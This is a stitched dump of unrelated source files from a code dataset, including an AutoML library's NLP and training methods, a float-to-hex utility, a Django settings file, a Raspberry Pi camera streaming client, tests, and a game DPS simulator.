bool = True,\r\n regex_number: Optional[str] = None,\r\n drop_punctuation: bool = True,\r\n **kwargs,\r\n ):\r\n \"\"\"Applies standard text cleaning to the corpus.\r\n\r\n Transformations include normalizing characters and dropping\r\n noise from the text (emails, HTML tags, URLs, etc...). The\r\n transformations are applied on the column named `Corpus`, in\r\n the same order the parameters are presented. 
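\r\n\r\n        For example, to keep numbers but apply the remaining steps:\r\n\r\n            atom.textclean(drop_number=False)\r\n\r\n        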
If there is no\r\n column with that name, an exception is raised.\r\n\r\n See nlp.py for a description of the parameters.\r\n\r\n \"\"\"\r\n check_method(self, \"nlpclean\")\r\n kwargs = self._prepare_kwargs(kwargs, TextCleaner().get_params())\r\n textcleaner = TextCleaner(\r\n decode=decode,\r\n lower_case=lower_case,\r\n drop_email=drop_email,\r\n regex_email=regex_email,\r\n drop_url=drop_url,\r\n regex_url=regex_url,\r\n drop_html=drop_html,\r\n regex_html=regex_html,\r\n drop_emoji=drop_emoji,\r\n regex_emoji=regex_emoji,\r\n drop_number=drop_number,\r\n regex_number=regex_number,\r\n drop_punctuation=drop_punctuation,\r\n **kwargs,\r\n )\r\n\r\n add_transformer(self, textcleaner)\r\n\r\n setattr(self.branch, \"drops\", getattr(textcleaner, \"drops\"))\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def tokenize(\r\n self,\r\n bigram_freq: Optional[SCALAR] = None,\r\n trigram_freq: Optional[SCALAR] = None,\r\n quadgram_freq: Optional[SCALAR] = None,\r\n **kwargs,\r\n ):\r\n \"\"\"Tokenize the corpus.\r\n\r\n Convert documents into sequences of words. Additionally,\r\n create n-grams (represented by words united with underscores,\r\n e.g. \"New_York\") based on their frequency in the corpus. The\r\n transformations are applied on the column named `Corpus`. If\r\n there is no column with that name, an exception is raised.\r\n\r\n See nlp.py for a description of the parameters.\r\n\r\n \"\"\"\r\n check_method(self, \"tokenize\")\r\n kwargs = self._prepare_kwargs(kwargs, Tokenizer().get_params())\r\n tokenizer = Tokenizer(\r\n bigram_freq=bigram_freq,\r\n trigram_freq=trigram_freq,\r\n quadgram_freq=quadgram_freq,\r\n **kwargs,\r\n )\r\n\r\n add_transformer(self, tokenizer)\r\n\r\n self.branch.bigrams = tokenizer.bigrams\r\n self.branch.trigrams = tokenizer.trigrams\r\n self.branch.quadgrams = tokenizer.quadgrams\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def normalize(\r\n self,\r\n stopwords: Union[bool, str] = True,\r\n custom_stopwords: Optional[SEQUENCE_TYPES] = None,\r\n stem: Union[bool, str] = False,\r\n lemmatize: bool = True,\r\n **kwargs,\r\n ):\r\n \"\"\"Normalize the corpus.\r\n\r\n Convert words to a more uniform standard. The transformations\r\n are applied on the column named `Corpus`, in the same order the\r\n parameters are presented. If there is no column with that name,\r\n an exception is raised.\r\n\r\n See nlp.py for a description of the parameters.\r\n\r\n \"\"\"\r\n check_method(self, \"normalize\")\r\n kwargs = self._prepare_kwargs(kwargs, Normalizer().get_params())\r\n normalizer = Normalizer(\r\n stopwords=stopwords,\r\n custom_stopwords=custom_stopwords,\r\n stem=stem,\r\n lemmatize=lemmatize,\r\n **kwargs,\r\n )\r\n\r\n add_transformer(self, normalizer)\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def vectorize(self, strategy: str = \"BOW\", **kwargs):\r\n \"\"\"Vectorize the corpus.\r\n\r\n Transform the corpus into meaningful vectors of numbers. The\r\n transformation is applied on the column named `Corpus`. 
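\r\n\r\n        For example (\"tfidf\" is one of the supported strategies, next\r\n        to \"bow\" and \"hashing\"):\r\n\r\n            atom.vectorize(strategy=\"tfidf\")\r\n\r\n        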
If\r\n there is no column with that name, an exception is raised.\r\n\r\n See nlp.py for a description of the parameters.\r\n\r\n \"\"\"\r\n check_method(self, \"normalize\")\r\n kwargs = self._prepare_kwargs(kwargs, Vectorizer().get_params())\r\n vectorizer = Vectorizer(strategy=strategy, **kwargs)\r\n\r\n add_transformer(self, vectorizer)\r\n\r\n # Attach the estimator attribute to atom's branch\r\n for attr in (\"bow\", \"tfidf\", \"hashing\"):\r\n if hasattr(vectorizer, attr):\r\n setattr(self.branch, attr, getattr(vectorizer, attr))\r\n\r\n # Feature engineering transformers ============================= >>\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def feature_generation(\r\n self,\r\n strategy: str = \"DFS\",\r\n n_features: Optional[int] = None,\r\n generations: int = 20,\r\n population: int = 500,\r\n operators: Optional[Union[str, SEQUENCE_TYPES]] = None,\r\n **kwargs,\r\n ):\r\n \"\"\"Apply automated feature engineering.\r\n\r\n Use Deep feature Synthesis or a genetic algorithm to create\r\n new combinations of existing features to capture the non-linear\r\n relations between the original features. Attributes created by\r\n the class are attached to atom.\r\n\r\n See feature_engineering.py for a description of the parameters.\r\n\r\n \"\"\"\r\n check_method(self, \"feature_generation\")\r\n columns = kwargs.pop(\"columns\", None)\r\n kwargs = self._prepare_kwargs(kwargs, FeatureGenerator().get_params())\r\n feature_generator = FeatureGenerator(\r\n strategy=strategy,\r\n n_features=n_features,\r\n generations=generations,\r\n population=population,\r\n operators=operators,\r\n **kwargs,\r\n )\r\n\r\n add_transformer(self, feature_generator, columns=columns)\r\n\r\n # Attach the genetic attributes to atom's branch\r\n if strategy.lower() in (\"gfg\", \"genetic\"):\r\n self.branch.symbolic_transformer = feature_generator.symbolic_transformer\r\n self.branch.genetic_features = feature_generator.genetic_features\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def feature_selection(\r\n self,\r\n strategy: Optional[str] = None,\r\n solver: Optional[Union[str, callable]] = None,\r\n n_features: Optional[Union[int, float]] = None,\r\n max_frac_repeated: Optional[Union[int, float]] = 1.0,\r\n max_correlation: Optional[float] = 1.0,\r\n **kwargs,\r\n ):\r\n \"\"\"Apply feature selection techniques.\r\n\r\n Remove features according to the selected strategy. Ties\r\n between features with equal scores are broken in an\r\n unspecified way. Additionally, removes features with too low\r\n variance and finds pairs of collinear features based on the\r\n Pearson correlation coefficient. For each pair above the\r\n specified limit (in terms of absolute value), it removes one\r\n of the two. 
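\r\n\r\n        For example, to keep the 10 best features according to a\r\n        univariate statistical test:\r\n\r\n            atom.feature_selection(strategy=\"univariate\", n_features=10)\r\n\r\n        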
Plotting methods and attributes created by the\r\n class are attached to atom.\r\n\r\n See feature_engineering.py for a description of the parameters.\r\n\r\n \"\"\"\r\n check_method(self, \"feature_selection\")\r\n if isinstance(strategy, str):\r\n if strategy.lower() == \"univariate\" and solver is None:\r\n if self.goal.startswith(\"reg\"):\r\n solver = \"f_regression\"\r\n else:\r\n solver = \"f_classif\"\r\n elif strategy.lower() in (\"sfm\", \"rfe\", \"rfecv\", \"sfs\"):\r\n if solver is None and self.winner:\r\n solver = self.winner.estimator\r\n elif isinstance(solver, str):\r\n # In case the user already filled the task...\r\n if not solver.endswith(\"_class\") and not solver.endswith(\"_reg\"):\r\n solver += \"_reg\" if self.task.startswith(\"reg\") else \"_class\"\r\n\r\n # If the run method was called before, use the main metric\r\n if strategy.lower() in (\"rfecv\", \"sfs\"):\r\n if self._metric and \"scoring\" not in kwargs:\r\n kwargs[\"scoring\"] = self._metric[0]\r\n\r\n columns = kwargs.pop(\"columns\", None)\r\n kwargs = self._prepare_kwargs(kwargs, FeatureSelector().get_params())\r\n feature_selector = FeatureSelector(\r\n strategy=strategy,\r\n solver=solver,\r\n n_features=n_features,\r\n max_frac_repeated=max_frac_repeated,\r\n max_correlation=max_correlation,\r\n **kwargs,\r\n )\r\n\r\n add_transformer(self, feature_selector, columns=columns)\r\n\r\n # Attach used attributes to atom's branch\r\n for attr in (\"collinear\", \"feature_importance\", str(strategy).lower()):\r\n if getattr(feature_selector, attr, None) is not None:\r\n setattr(self.branch, attr, getattr(feature_selector, attr))\r\n\r\n # Training methods ============================================= >>\r\n\r\n def _check(self, metric, gib, needs_proba, needs_threshold):\r\n \"\"\"Check whether the provided metric is valid.\r\n\r\n Parameters\r\n ----------\r\n metric: str, sequence or callable\r\n Metric provided for the run.\r\n\r\n gib: bool or sequence\r\n Whether the metric is a score or a loss function.\r\n\r\n needs_proba: bool or sequence\r\n Whether the metric function requires probability estimates\r\n out of a classifier.\r\n\r\n needs_threshold: bool or sequence\r\n Whether the metric function takes a continuous decision\r\n certainty.\r\n\r\n Returns\r\n -------\r\n metric: str, function, scorer or sequence\r\n Metric for the run. Should be the same as previous run.\r\n\r\n \"\"\"\r\n if self._metric:\r\n # If the metric is empty, assign the existing one\r\n if metric is None:\r\n metric = self._metric\r\n else:\r\n # If there's a metric, it should be the same as previous run\r\n _metric = BaseTrainer._prepare_metric(\r\n metric=lst(metric),\r\n greater_is_better=gib,\r\n needs_proba=needs_proba,\r\n needs_threshold=needs_threshold,\r\n )\r\n\r\n if list(_metric.keys()) != list(self._metric.keys()):\r\n raise ValueError(\r\n \"Invalid value for the metric parameter! The metric \"\r\n \"should be the same as previous run. Expected \"\r\n f\"{self.metric}, got {flt([m.name for m in _metric])}.\"\r\n )\r\n\r\n return metric\r\n\r\n def _run(self, trainer):\r\n \"\"\"Run the trainer.\r\n\r\n If all models failed, catch the errors and pass them to the\r\n atom before raising the exception. 
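\r\n\r\n        Schematically, the body below amounts to `try: trainer.run()`\r\n        followed by a `finally` block that copies `trainer.errors` into\r\n        atom's `errors` attribute.\r\n\r\n        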
If successful run, update\r\n all relevant attributes and methods.\r\n\r\n Parameters\r\n ----------\r\n trainer: class\r\n Trainer instance to run.\r\n\r\n \"\"\"\r\n try:\r\n trainer._tracking_params = self._tracking_params\r\n trainer._branches = {self._current: self.branch}\r\n trainer._current = self._current\r\n trainer.scaled = self.scaled\r\n trainer.run()\r\n finally:\r\n # Catch errors and pass them to atom's attribute\r\n for model, error in trainer.errors.items():\r\n self.errors[model] = error\r\n self._models.pop(model, None)\r\n\r\n # Update attributes\r\n self._models.update(trainer._models)\r\n self._metric = trainer._metric\r\n\r\n for model in self._models:\r\n self.errors.pop(model.name, None) # Remove model from errors (if there)\r\n model.T = self # Change the model's parent class from trainer to atom\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def run(\r\n self,\r\n models: Optional[Union[str, callable, SEQUENCE_TYPES]] = None,\r\n metric: Optional[Union[str, callable, SEQUENCE_TYPES]] = None,\r\n greater_is_better: Union[bool, SEQUENCE_TYPES] = True,\r\n needs_proba: Union[bool, SEQUENCE_TYPES] = False,\r\n needs_threshold: Union[bool, SEQUENCE_TYPES] = False,\r\n n_calls: Union[int, SEQUENCE_TYPES] = 0,\r\n n_initial_points: Union[int, SEQUENCE_TYPES] = 5,\r\n est_params: Optional[dict] = None,\r\n bo_params: Optional[dict] = None,\r\n n_bootstrap: Union[int, SEQUENCE_TYPES] = 0,\r\n **kwargs,\r\n ):\r\n \"\"\"Fit the models in a direct fashion.\r\n\r\n Fit and evaluate over the models. Contrary to SuccessiveHalving\r\n and TrainSizing, the direct approach only iterates once over the\r\n models, using the full dataset.\r\n\r\n See the basetrainer.py module for a description of the parameters.\r\n\r\n \"\"\"\r\n metric = self._check(metric, greater_is_better, needs_proba, needs_threshold)\r\n\r\n params = (\r\n models, metric, greater_is_better, needs_proba, needs_threshold,\r\n n_calls, n_initial_points, est_params, bo_params, n_bootstrap\r\n )\r\n\r\n kwargs = self._prepare_kwargs(kwargs)\r\n if self.goal.startswith(\"class\"):\r\n trainer = DirectClassifier(*params, **kwargs)\r\n else:\r\n trainer = DirectRegressor(*params, **kwargs)\r\n\r\n self._run(trainer)\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def successive_halving(\r\n self,\r\n models: Union[str, callable, SEQUENCE_TYPES],\r\n metric: Optional[Union[str, callable, SEQUENCE_TYPES]] = None,\r\n greater_is_better: Union[bool, SEQUENCE_TYPES] = True,\r\n needs_proba: Union[bool, SEQUENCE_TYPES] = False,\r\n needs_threshold: Union[bool, SEQUENCE_TYPES] = False,\r\n skip_runs: int = 0,\r\n n_calls: Union[int, SEQUENCE_TYPES] = 0,\r\n n_initial_points: Union[int, SEQUENCE_TYPES] = 5,\r\n est_params: Optional[dict] = None,\r\n bo_params: Optional[dict] = None,\r\n n_bootstrap: Union[int, SEQUENCE_TYPES] = 0,\r\n **kwargs,\r\n ):\r\n \"\"\"Fit the models in a successive halving fashion.\r\n\r\n The successive halving technique is a bandit-based algorithm\r\n that fits N models to 1/N of the data. The best half are\r\n selected to go to the next iteration where the process is\r\n repeated. This continues until only one model remains, which\r\n is fitted on the complete dataset. Beware that a model's\r\n performance can depend greatly on the amount of data on which\r\n it is trained. For this reason, it is recommended to only use\r\n this technique with similar models, e.g. 
only using tree-based\r\n        models.\r\n\r\n        See the basetrainer.py module for a description of the parameters.\r\n\r\n        \"\"\"\r\n        metric = self._check(metric, greater_is_better, needs_proba, needs_threshold)\r\n\r\n        params = (\r\n            models, metric, greater_is_better, needs_proba, needs_threshold,\r\n            skip_runs, n_calls, n_initial_points, est_params, bo_params, n_bootstrap\r\n        )\r\n\r\n        kwargs = self._prepare_kwargs(kwargs)\r\n        if self.goal.startswith(\"class\"):\r\n            trainer = SuccessiveHalvingClassifier(*params, **kwargs)\r\n        else:\r\n            trainer = SuccessiveHalvingRegressor(*params, **kwargs)\r\n\r\n        self._run(trainer)\r\n\r\n    @composed(crash, method_to_log, typechecked)\r\n    def train_sizing(\r\n        self,\r\n        models: Union[str, callable, SEQUENCE_TYPES],\r\n        metric: Optional[Union[str, callable, SEQUENCE_TYPES]] = None,\r\n        greater_is_better: Union[bool, SEQUENCE_TYPES] = True,\r\n        needs_proba: Union[bool, SEQUENCE_TYPES] = False,\r\n        needs_threshold: Union[bool, SEQUENCE_TYPES] = False,\r\n        train_sizes: Union[int, SEQUENCE_TYPES] = 5,\r\n        n_calls: Union[int, SEQUENCE_TYPES] = 0,\r\n        n_initial_points: Union[int, SEQUENCE_TYPES] = 5,\r\n        est_params: Optional[dict] = None,\r\n        bo_params: Optional[dict] = None,\r\n        n_bootstrap: Union[int, SEQUENCE_TYPES] = 0,\r\n        **kwargs,\r\n    ):\r\n        \"\"\"Fit the models in a train sizing fashion.\r\n\r\n        When training models, there is usually a trade-off between\r\n        model performance and computation time, which is regulated by\r\n        the number of samples in the training set. This method can be\r\n        used to create insights into this trade-off, and help determine\r\n        the optimal size of the training set. The models are fitted\r\n        multiple times, ever-increasing the number of samples in the\r\n        training set.\r\n\r\n        See the basetrainer.py module for a description of the parameters.\r\n\r\n        \"\"\"\r\n        metric = self._check(metric, greater_is_better, needs_proba, needs_threshold)\r\n\r\n        params = (\r\n            models, metric, greater_is_better, needs_proba, needs_threshold,\r\n            train_sizes, n_calls, n_initial_points, est_params, bo_params, n_bootstrap\r\n        )\r\n\r\n        kwargs = self._prepare_kwargs(kwargs)\r\n        if self.goal.startswith(\"class\"):\r\n            trainer = TrainSizingClassifier(*params, **kwargs)\r\n        else:\r\n            trainer = TrainSizingRegressor(*params, **kwargs)\r\n\r\n        self._run(trainer)\r\n","sub_path":"atom/atom.py","file_name":"atom.py","file_ext":"py","file_size_in_byte":56618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"612085227","text":"\"\"\"\nsource:\n\nhttps://stackoverflow.com/questions/23624212/how-to-convert-a-float-into-hex\n\"\"\"\n\nimport math\nimport struct\n\n\ndef float_to_hex(f):\n    # pack the float as 4 little-endian bytes, then reinterpret as uint32\n    return hex(struct.unpack('<I', struct.pack('<f', f))[0])\n\n\ndef hex_to_float(h):\n    # inverse of float_to_hex: reinterpret the uint32 bit pattern as a float\n    return struct.unpack('<f', struct.pack('<I', h))[0]\n\n\ndef frac_to_float(frac, num_bits, expo):\n    # interpret frac as a mantissa of num_bits bits whose top bit has\n    # weight 2 ** expo, i.e. value = frac * 2 ** (expo - num_bits + 1)\n    v = 0.0\n    expo -= num_bits - 1\n    while frac:\n        if frac & 1:\n            v += 2.0 ** expo\n        expo += 1\n        frac >>= 1\n    return v\n\n\ndef hex_to_float_m(h):\n    sign = h & 0x80000000\n    expo = (h & 0x7F800000) >> 23\n    expo -= 0x7F\n    frac = 0x800000 + (h & 0x7FFFFF)\n    v = frac_to_float(frac, 24, expo)\n    if sign:\n        return -v\n    return v\n\n\ndef decimal_to_bin(deci):\n    b = 0\n    expo = 0\n    while deci:\n        if deci % 2:\n            b += pow(2, expo)\n        expo += 1\n        deci //= 2\n    return b\n\n\ndef frac_to_bin(frac, num_bits):\n    bits = list()\n    for i in range(num_bits):\n        bits.append(1 if frac * 2 >= 1 else 0)\n        frac = frac * 2\n        if frac > 1:\n            frac -= 1\n        elif abs(frac - 1) < 1e-15:\n            break\n    return sum(pow(2, e) if b else 0 for e, b in enumerate(reversed(bits)))\n\n\ndef float_to_hex_m(f):\n    sign = 1 if f < 0 else 0\n    f = abs(f)\n    decimal_bits = decimal_to_bin(int(f))\n    frac_bits = frac_to_bin(f - int(f), 23)\n    # start with the sign bit\n    v = 
0x80000000 if sign else 0\n    # followed by expo\n    expo = int(math.log(decimal_bits, 2)) if decimal_bits else 0\n    v += (127 + expo) << 23\n    # at last, the frac\n    if not frac_bits:\n        return v\n    frac_num_bits = int(math.log(frac_bits, 2)) + 1\n    frac_bits = (decimal_bits << frac_num_bits) + frac_bits\n    frac_num_bits = int(math.log(frac_bits, 2)) + 1\n    if frac_num_bits > 24:\n        frac_bits >>= (frac_num_bits - 24)\n    elif frac_num_bits < 24:\n        frac_bits <<= (24 - frac_num_bits)\n    # keep only the 23 stored mantissa bits (strip the implicit leading 1);\n    # note this helper only yields a correct exponent for f >= 1, since\n    # leading zero bits of a pure fraction are lost in frac_to_bin\n    return v + (frac_bits - 0x800000)\n\n\nif __name__ == '__main__':\n    print(float_to_hex(0.72))\n    print('0x{:x}'.format(float_to_hex_m(0.72)))\n\n    # some commonly known numbers\n    print(float_to_hex(0.5))\n    print('0x{:x}'.format(float_to_hex_m(0.5)))\n    print(float_to_hex(-2.0))\n    print('0x{:x}'.format(float_to_hex_m(-2.0)))\n\n    print(frac_to_float(0b1101101, 7, 2))\n\n    print(hex_to_float(0xC0DA0000))\n    print(hex_to_float_m(0xC0DA0000))\n    print(hex_to_float(0xC0140000))\n    print(hex_to_float_m(0xC0140000))\n    print(hex_to_float(0x3EA00000))\n    print(hex_to_float_m(0x3EA00000))\n\n    print('{:b}'.format(decimal_to_bin(200)))\n    print('{:b}'.format(frac_to_bin(0.6875, 22)))\n","sub_path":"bitsmanip/test_52_binaryToString.py","file_name":"test_52_binaryToString.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"309484182","text":"DEBUG = True\n#SECRET_KEY = 'not a very secret key'\nADMINS = (\n)\n#ALLOWED_HOSTS = [\"*\"]\n\nSTATIC_ROOT = '/local/grader/static/'\nMEDIA_ROOT = '/local/grader/media/'\nSUBMISSION_PATH = '/local/grader/uploads'\nPERSONALIZED_CONTENT_PATH = '/local/grader/ex-meta'\nSTATIC_URL_HOST_INJECT = 'http://localhost:8080'\n\nCONTAINER_SCRIPT = '/srv/docker-compose-run.sh'\n\nDATABASES = {\n    'default': {\n        'ENGINE': 'django.db.backends.sqlite3',\n        'NAME': '/local/grader/db.sqlite3',\n    }\n}\n\nCACHES = {\n    'default': {\n        'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',\n        'LOCATION': 'unique-snowflake',\n    },\n}\n\nLOGGING['loggers'].update({\n    '': {\n        'level': 'INFO',\n        'handlers': ['console'],\n        'propagate': True,\n    },\n    #'django.db.backends': {\n    #    'level': 'DEBUG',\n    #},\n})\n\n# kate: space-indent on; indent-width 4;\n# vim: set expandtab ts=4 sw=4:\n","sub_path":"rootfs/srv/grader-cont-settings.py","file_name":"grader-cont-settings.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"187204770","text":"import re\n\nimport xlrd\n\nWS_NAMES = [ \"ETF\", \"MM_Arb\", \"MM - HFT\", \"OMM\", \"HTETF\", \"Warrant_CBBC\" ]\n\ndef xlsx_to_arrs(xlsx_file, worksheets=[], row_start=0, row_end=-1, col_start=0, col_end=-1):\n\theader = ''\n\tarr = []\n\twb = xlrd.open_workbook(xlsx_file)\n\tws = None\n\tfor worksheet in worksheets:\n\t\ttry:\n\t\t\tws = wb.sheet_by_name(worksheet)\n\t\texcept:\n\t\t\tcontinue\n\n\t\trow_end = ws.nrows if row_end == -1 else row_end\n\t\tcol_end = ws.ncols if col_end == -1 else col_end\n\n\t\tarr = [ws.row_values(row, start_colx=col_start, end_colx=col_end) for row in range(row_start, row_end)]\n\t\t# de-duplicate repeated header names by suffixing the column index\n\t\theader = ','.join(x if x not in arr[0][:n] else x+str(n) for n, x in enumerate(arr[0]) )\n\n\treturn re.sub(r\"[\\*\\.#/\\$%\\\"\\(\\)& \\_]\", \"\", header), arr[1:]\n","sub_path":"pnl/ed_pnl.py","file_name":"ed_pnl.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"186586777","text":"import cv2\nimport io\nimport socket\nimport struct\nimport time\nimport pickle\nimport 
zlib\nfrom gpiozero import LED\n\nledgreen=LED(26)\nledred=LED(19)\nisKnown=False\nstart=0\nboolProcess=False\nledred.on()\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client_socket:\n client_socket.connect(('192.168.0.152', 8485))\n connection = client_socket.makefile('wb')\n cam = cv2.VideoCapture(0)\n cam.set(3, 320);\n cam.set(4, 240);\n encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), 90]\n while True:\n ret, frame = cam.read()\n result, frame = cv2.imencode('.jpg', frame, encode_param)\n send_data = pickle.dumps(frame, 0)\n size = len(send_data)\n client_socket.sendall(struct.pack(\">L\", size) + send_data)\n client_data = client_socket.recv(1024)\n client_data.decode()\n client_data=str(client_data)\n if(client_data!=\"b'unknown'\"):\n isKnown=True\n start=time.time()\n if(isKnown==True):\n boolProcess=True\n if(time.time()-start<10):\n ledred.off()\n ledgreen.on()\n if(time.time()-start>11):\n start=0\n ledred.on()\n ledgreen.off()\n print(\"ledoff\")\n boolProcess=False\n isKnown=False\n print(client_data)\n cam.release()\n\n","sub_path":"pythonTest/client1.py","file_name":"client1.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"87710749","text":"import pytest\nfrom router_microservice import get_rest_microservice\nimport json\n\nclass UserObject(object):\n def __init__(self,metrics_ok=True):\n self.metrics_ok = metrics_ok\n\n def route(self,X,features_names):\n return 22\n \n def tags(self):\n return {\"mytag\":1}\n\n def metrics(self):\n if self.metrics_ok:\n return [{\"type\":\"COUNTER\",\"key\":\"mycounter\",\"value\":1}]\n else:\n return [{\"type\":\"BAD\",\"key\":\"mycounter\",\"value\":1}]\n\n\n\ndef test_router_ok():\n user_object = UserObject()\n app = get_rest_microservice(user_object,debug=True)\n client = app.test_client()\n rv = client.get('/route?json={\"data\":{\"ndarray\":[2]}}')\n j = json.loads(rv.data)\n print(j)\n assert rv.status_code == 200\n assert j[\"meta\"][\"tags\"] == {\"mytag\":1}\n assert j[\"meta\"][\"metrics\"] == user_object.metrics()\n assert j[\"data\"][\"ndarray\"] == [[22]] \n\ndef test_router_no_json():\n user_object = UserObject()\n app = get_rest_microservice(user_object,debug=True)\n client = app.test_client()\n uo = UserObject()\n rv = client.get('/route?')\n j = json.loads(rv.data)\n print(j)\n assert rv.status_code == 400\n\ndef test_router_bad_metrics():\n user_object = UserObject(metrics_ok=False)\n app = get_rest_microservice(user_object,debug=True)\n client = app.test_client()\n rv = client.get('/route?json={\"data\":{\"ndarray\":[]}}')\n j = json.loads(rv.data)\n print(j)\n assert rv.status_code == 400\n \n","sub_path":"wrappers/python/test_router_microservice.py","file_name":"test_router_microservice.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"625438991","text":"import numpy as np\nimport matplotlib.pyplot as pl\nfrom lnlikefn import QP, lnlike\n\nx = np.sort(np.random.rand(100))*10.\nyerr = .01*np.ones_like(x)\n\ntheta = [1., 1., 1., 5.]\nK = QP(x, x, theta) + np.diag(yerr**2)\n\npl.clf()\npl.imshow(K, cmap = 'gray', interpolation = 'nearest')\npl.savefig('K')\n\ny = np.random.multivariate_normal(np.zeros_like(x), K)\npl.clf()\npl.errorbar(x, y, yerr = yerr, fmt = 'k.')\npl.plot(x, y, 'b-')\npl.savefig('xy')\n\nP = np.arange(0.1, 3, 0.01)\nL = np.empty_like(P)\n\ntheta2 = np.array(theta)\nfor i, per in 
enumerate(P):\n theta2[1] = per\n L[i] = lnlike(theta2, x, y, yerr)\n\npl.clf()\npl.plot(P, L, 'k-')\npl.savefig('likelihood')\n","sub_path":"rotation/dantest.py","file_name":"dantest.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"597862709","text":"import random,time,math\nfrom Talents import Talents\nfrom Trinkets import Trinket\nimport Items\nimport SetBonuses\n\nstart = time.time() #used to track runtime of program \n\n#go to this website and paste the talent string u get at the bottom of the website http://calculators.iradei.eu/talents/hunter\ntalents = Talents('0000000000000000000000550201205000000000033301002500302300530350')\n\n#dictionary for buffs, key is the name of the buff and value is whether the buff is active or not.\nbuffsActive = {'agi_elixir':True,'mp5_elixir':True,'ap_flask':False,'mp5_food':False,'agi_scroll':True,'agi_food':True,'bom':True,'bow':True,'bok':True,'motw':True,'ai':True,'goa':True,'mst':True,'wft':True,'lotp':True,'fi':True,'aoth': True, 'aotw':False, 'quickshots': False, 'rapidfire': False, 'berserking': False,'drums_of_battle':False,'master_tactician':False}\nagility=intellect=spirit=power=mp5=crit_rating=crit_percent=agility_from_gear=intellect_from_gear=power_from_gear=hit=armor_pen=0\ncasting_haste=1 #casting speed modifier. This value is multiplied by spell casting times, so if you have rapid fire up, this value becomes 0.6 meaning steady shot's cast time is 1.5 * 0.6\n\nif buffsActive['bow']: mp5 += 40\nif buffsActive['motw']: agility,intellect,spirit = agility+14,intellect+14,spirit+14\nif buffsActive['ai']: intellect += 40\nif buffsActive['goa']: agility+=77\nif buffsActive['mst']: mp5+=50\nif buffsActive['agi_elixir']: agility,crit_rating = agility+35,crit_rating+20\nif buffsActive['agi_scroll']: agility+=20\nif buffsActive['agi_food']: agility+=20\nif buffsActive['lotp']: crit_percent=5\nif buffsActive['mp5_food']: mp5+=8\n\nhaste_rating_per_percent = 15.77\n\n#items\nhead=Items.item('beast lord helm')\nneck=Items.item('choker of vile intent')\nshoulders=Items.item('beast lord mantle')\ncloak=Items.item('drape of the dark reavers')\nchest=Items.item('beast lord quirass')\nbracers=Items.item('felstalker bracers')\ngloves=Items.item('beast lord handguards')\nbelt=Items.item('felstalker belt')\nlegs=Items.item('scaled greaves of patience')\nboots=Items.item('fiend slayer boots')\nring1=Items.item('truestrike ring')\nring2=Items.item('garonas signet ring')\ntrinket1=Items.item('bloodlust brooch')\ntrinket2=Items.item('hourglass of the unraveller')\nweapon=Items.item('sonic spear')\nranged=Items.item('Sunfury Bow of the Phoenix','ranged')\n\ngear = [head,neck,shoulders,cloak,chest,bracers,gloves,belt,legs,boots,ring1,ring2,trinket1,trinket2,weapon,ranged]\n#gear = [ranged]\n\nspeed = ranged['speed'] #ranged wep speed\nbase_speed = speed #incase speed gets changed, this value will have the original weapon speed\n\n#calculate stats gained from gear\nfor item in gear:\n agility_from_gear+=item['agility']\n intellect_from_gear+=item['intellect']\n power_from_gear+=item['power']\n crit_rating+=item['crit']\n mp5+=item['mp5']\n hit+=item['hit']\n armor_pen+=item['armor_pen']\n speed /= (((item['haste'] / haste_rating_per_percent) / 100) + 1)\n casting_haste += ((item['haste'] / haste_rating_per_percent) / 100)\n\n#calculate which set bonuses are applied\nSetBonuses.set_bonuses()\n#apply the stats gained from set bonuses\nhit += 
SetBonuses.bonuses['hit']\narmor_pen += SetBonuses.bonuses['armor_pen']\n\n#Character stats\nrace = 'troll'\nlevel = 70\nagility_from_race = 152\nagility += (agility_from_race + agility_from_gear)\nintellect_from_race = 73\nintellect += intellect_from_race + intellect_from_gear\nspirit += 84 #84 from race\npower_from_race = 140\npower_from_agi = agility-10\npower += (power_from_race + power_from_agi + power_from_gear) #140 from race 819 from gear\npower_modifier=1\ncrit_rating_per_percent = 22.08 #do not modify\nagility_per_crit_percent = 40 #do not modify\ncrit_from_race = 1 if ranged['type'] == 'bow' and race == 'troll' else 0 #Trolls get 1% crit with bows \ncrit_percent += -1.53 + crit_from_race + (crit_rating/crit_rating_per_percent) + (agility/agility_per_crit_percent) #crit starts at -1.53% for hunters\nquiver = 15 #quiver attack speed bonus\nmana_from_race = 3383 #3383 mana at lvl 70\nmaxmana = mana_from_race + (intellect*15) #15 mana for each point of intellect\nmana = maxmana\nbase_weapon_dmg_lower = ranged['weapondmglower'] #lower end of the weapon damage\nbase_weapon_dmg_upper = ranged['weapondmgupper'] #upper end of the weapon damage\nweapon_dps = ((base_weapon_dmg_lower+base_weapon_dmg_upper)/2) / speed\narrow_dps = 37 if ranged['name'] != 'Thoridal, The Stars Fury' else 0 #thori'dal doesn't use arrows, so we make arrow_dps 0 if you're using that bow\nweapon_dmg_lower = ((power / 14) * speed) + base_weapon_dmg_lower + (arrow_dps * speed)\nweapon_dmg_upper = ((power / 14) * speed) + base_weapon_dmg_upper + (arrow_dps * speed)\ncrit_bonus = 2.0\ndamage_modifier = 1\nhit_rating_per_percent = 106/6.72\n\n#auto shots and special shots per minute depending on rotation\nshot_frequency = 